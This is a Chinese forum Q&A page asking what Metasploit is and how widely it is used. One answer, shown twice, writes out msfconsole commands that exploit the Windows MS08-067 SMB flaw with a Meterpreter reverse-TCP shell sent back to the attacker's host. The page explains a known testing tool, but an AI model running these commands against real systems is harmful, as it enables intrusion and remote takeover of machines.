Metasploit 渗透测试应用广吗?
最近看到有一些关于Metasploit渗透,我想知道这是不是一款软件?
这种技术在实际的应用大不?
有使用过,或者了解的人回答一下问题么
这种技术在实际的应用大不?
有使用过,或者了解的人回答一下问题么
按票数排序按时间排序
3 个回答
什么是答案总结? 答案总结
准确地说,这是一种渗透测试框架,包含各种payload,可以作为简单的漏洞利用工具。比如你用漏洞扫描器(如nessus)扫描系统时发现有ms08-067这个漏洞,就可以使用search、use、set、exploit完成攻击。
msf > search ms08_067 //搜索具体代号的漏洞,如ms08_067,ms12_020
msf > use exploit/windows/smb/ms08_067_netapi //使用这个exploit,下面设置参数
msf exploit(ms08_067_netapi) > set RHOST 10.12.41.229 //攻击服务器ip
msf exploit(ms08_067_netapi) > set LHOST 10.12.41.228 //自己本机ip
msf exploit(ms08_067_netapi) > set LPORT 443 //反弹本地端口
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp //反弹连接
msf exploit(ms08_067_netapi) > exploit //攻击
这里有篇T00ls的教程,可以参考下:metasploit 笔记:http://www.cnblogs.com/vigarbuaa/archive/2013/03/06/2946505.html
具体内容可参见诸葛建伟老师翻译的《metasploit渗透测试指南》。ctf比赛国内比较厉害的清华blue-lotus写exploit也是基于这个框架。
msf > search ms08_067 //搜索具体代号的漏洞,如ms08_067,ms12_020
msf > use exploit/windows/smb/ms08_067_netapi //使用这个exploit,下面设置参数
msf exploit(ms08_067_netapi) > set RHOST 10.12.41.229 //攻击服务器ip
msf exploit(ms08_067_netapi) > set LHOST 10.12.41.228 //自己本机ip
msf exploit(ms08_067_netapi) > set LPORT 443 //反弹本地端口
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp //反弹连接
msf exploit(ms08_067_netapi) > exploit //攻击
这里有篇T00ls的教程,可以参考下:metasploit 笔记:http://www.cnblogs.com/vigarbuaa/archive/2013/03/06/2946505.html具体内容可参见诸葛建伟老师翻译的《metasploit渗透测试指南》。ctf比赛国内比较厉害的清华blue-lotus写exploit也是基于这个框架。
小安
收起请看百度百科http://baike.baidu.com/link?url=Q4kM4RywW9R86chO8OIbQ7fdwcJToq81lFFG2epLH70PZ8mxZD2AE58tM-BEOeQYVZ9ulBUHB0vKxTR8iAK41q
